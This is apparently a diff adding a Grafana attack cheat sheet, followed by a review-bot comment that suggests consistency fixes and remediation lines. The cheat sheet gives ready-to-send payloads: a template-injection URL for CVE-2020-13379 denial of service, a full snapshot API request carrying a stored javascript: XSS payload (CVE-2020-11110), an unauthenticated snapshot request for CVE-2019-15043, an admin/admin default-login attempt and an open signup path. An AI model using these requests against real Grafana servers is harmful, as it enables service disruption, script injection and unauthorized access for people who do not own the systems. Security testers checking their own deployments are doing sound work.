| 1 | + | # Grafana |
| 2 | + | 1. CVE-2020-13379 (Denial of Service) |
| 3 | + | ``` |
| 4 | + | <GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D |
| 5 | + | ``` |
| 6 | + | 2. CVE-2020-11110 (Stored XSS) |
| 7 | + | ``` |
| 8 | + | POST /api/snapshots HTTP/1.1 |
| 9 | + | Host: <GRAFANA URL> |
| 10 | + | Accept: application/json, text/plain, */* |
| 11 | + | Accept-Language: en-US,en;q=0.5 |
| 12 | + | Referer: {{BaseURL}} |
| 13 | + | content-type: application/json |
| 14 | + | Connection: close |
| 15 | + | |
| 16 | + | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} |
| 17 | + | ``` |
| 18 | + | 3. CVE-2019-15043 (Grafana Unauthenticated API) |
| 19 | + | ``` |
| 20 | + | POST /api/snapshots HTTP/1.1 |
| 21 | + | Host: <GRAFANA URL> |
| 22 | + | Connection: close |
| 23 | + | Content-Length: 235 |
| 24 | + | Accept: */* |
| 25 | + | Accept-Language: en |
| 26 | + | Content-Type: application/json |
| 27 | + | |
| 28 | + | {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} |
| 29 | + | ``` |
| 30 | + | 4. Default Credentials |
| 31 | + | ``` |
| 32 | + | Try to login using admin as username and password |
| 33 | + | ``` |
| 34 | + | 5. Signup Enabled |
| 35 | + | ``` |
| 36 | + | <GRAFANA URL>/signup |
| 37 | + | ``` |
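Review bot: The `Referer: {{BaseURL}}` header in the item 2 request is an unexpanded template variable, while every other line uses `<GRAFANA URL>`; anyone reusing the request as written sends the literal braces, so it should read `Referer: <GRAFANA URL>`. None of the five entries says what response separates an affected instance from a patched one, or what the fix is, so a reader cannot turn a result into a finding or a remediation ticket. I would add a short line under each item, for example `Fix: set allow_sign_up = false under [users] in grafana.ini` for item 5 and `Fix: change the admin password on first login, or set admin_password under [security]` for item 4. For the three CVE items, a similar line should point to the fixed release named in the vendor advisory. Item 2's request also omits `Content-Length`, which item 3 includes, so the two snapshot requests are inconsistent as documentation.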